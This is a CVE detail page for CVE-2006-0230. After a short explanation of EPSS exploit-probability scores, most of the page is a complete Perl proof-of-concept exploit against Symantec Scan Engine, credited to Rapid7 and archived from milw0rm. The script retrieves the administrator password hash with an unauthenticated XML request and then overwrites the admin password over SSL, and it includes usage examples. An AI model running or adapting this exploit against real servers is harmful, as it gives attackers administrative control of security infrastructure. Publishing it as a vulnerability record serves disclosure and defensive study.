CVE-2006-0230 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl -w # # Remotely change the administrator password (or password hash) of # Symantec Scan Engine. # # Author: Marc Bevand of Rapid7 <marc_bevand(at)rapid7.com> # Copyright 2006 Rapid7, LLC. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # # THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS # OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # use strict; use Getopt::Long; use LWP::UserAgent; use Digest::MD5 qw/md5_hex/; use Net::SSLeay::Handle qw/shutdown/; # # Init LWP::UserAgent (the user agent string is the one currently used # by the Scan Engine java applet). # sub init { my $ua; $ua = LWP::UserAgent->new(keep_alive => 0); $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08"); return $ua; } # # Example of service string to be parsed: # 10.68.4.4 # 10.68.4.4/8004/8005 # hostname # hostname/9004/9005 # sub parse_service { my ($service) = @_; if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) { return $1, $2, $3; } elsif ($service =~ m{^([^/]*)$}) { return $1, 8004, 8005; } else { die "cannot parse service: $service"; } } # # Sends a request to obtain the password hash. Note: the RSA key # (modulus and public exponent) has been randomly chosen. # sub data_to_send { my $r1 = '<request><key mod="784607708866372110095636553206565253692059085'. '0882661452379500719255245078226751123858547991180612629396444366'. '109364669329014831409765373165312900564995261" pub="754297542068'. '3822223796790522532950961415568940207500046396606172395479254814'. '3383744922039888710333203519260280729415961892539564611703079983'. '74406014351745">I need the key</key></request>' ; return $r1; } # # Example of response to be parsed: # <request> # <message xmlns:xs="http://www.w3.org/2001/XMLSchema" # xmlns:java="class:com.symantec.common.SimpleRSA" # value="01234567890123456789012345678901234567890123456789012345\ # 6789"/> # <password xmlns:xs="http://www.w3.org/2001/XMLSchema" # xmlns:java="class:com.symantec.common.SimpleRSA" # pass="86B7A1FE120C0279971559B6BAC8C5713EF580BAFD20168D622B7E170\ # D248642"/> # </request> # sub parse_resp { my ($res) = @_; if ($res =~ /pass="([[:xdigit:]]{64})"/) { return $1; } else { die "cannot parse response: $res"; } } # # Return a password hash. # sub hash_passwd { my ($pwd) = @_; my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff), rand(0xffffffff), rand(0xffffffff), rand(0xffffffff); return uc(md5_hex("$pwd$salt")) . $salt; } sub send_request { my ($socket, $req) = @_; $req = pack("n", length($req)).$req; print $socket $req; } # # Set the administrator password hash. # sub set_hash { my ($hostname, $port_ssl, $hash) = @_; my $socket; my $reply; tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl) or die "ssl tie: $!"; $socket = \*SSL; send_request($socket, '<request command="submit" parms="apply" type="saveapply">'. '<![CDATA[<?xml version="1.0" encoding="UTF-8"?>'. '<guichanges><configuration>'. '<changes xpath="//admin/password/@value" value="'.$hash.'"/>'. '</configuration></guichanges>'. ']]></request>'); send_request($socket, 'UTFWritesDone'); shutdown($socket, 1) or die "ssl shutdown: $!"; $reply = substr(<$socket>, 2); $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2); if ($reply !~ m{<message status='apply_success'>Apply!</message>}) { die "command failed: $reply"; } close($socket) or die "ssl close: $!"; } sub doit { my ($service, $pwd, $hash) = @_; my $hostname; my $port_http; my $port_ssl; my $ua; my $url; my $req; my $res; my $old_hash; ($hostname, $port_http, $port_ssl) = parse_service($service); $ua = init(); $url = "http://$hostname:$port_http/xml.xml"; $req = HTTP::Request->new(POST => $url); $req->content_type('application/x-www-form-urlencoded'); $req->content(data_to_send()); $res = $ua->request($req); $res->is_success or die "got ".$res->status_line." for $url\n"; ($old_hash) = parse_resp($res->content); print "Old hash: $old_hash\n"; if ($hash) { set_hash($hostname, $port_ssl, $hash); print "New hash: $hash\n"; } else { $hash = hash_passwd($pwd); set_hash($hostname, $port_ssl, $hash); print "New hash: $hash\n"; print "Password successfully set to: '$pwd'\n"; } } sub error { print STDERR "Try `$0 --help' for more information.\n"; } sub usage { print "Usage:\n". " $0 [OPTIONS] <hostname>\n". " $0 [OPTIONS] <hostname>/<http_port>/<ssl_port>\n". "Options:\n". " --help Display this help\n". " --pwd <passwd> Set the password (default: test)\n". " --hash <passwd_hash> Set the password hash instead of a parti". "cular password\n". "Examples:\n". " $0 10.68.4.4\n". " $0 --pwd foobar 10.68.4.4/8004/8005\n". ""; } sub main { my $help; my $pwd = "test"; my $hash; my $service; if (!GetOptions( "help" => \$help, "pwd=s" => \$pwd, "hash=s" => \$hash, )) { error(); exit(1); } if ($help) { usage(); exit(0); } if (!scalar(@ARGV)) { print STDERR "No service specified.\n"; error(); exit(1); } elsif (1 == scalar(@ARGV)) { $service = $ARGV[0]; } else { print STDERR "Extra argument: $ARGV[1]\n"; error(); exit(1); } doit($service, $pwd, $hash); } main(); # # END proof of concept # # milw0rm.com [2006-04-21]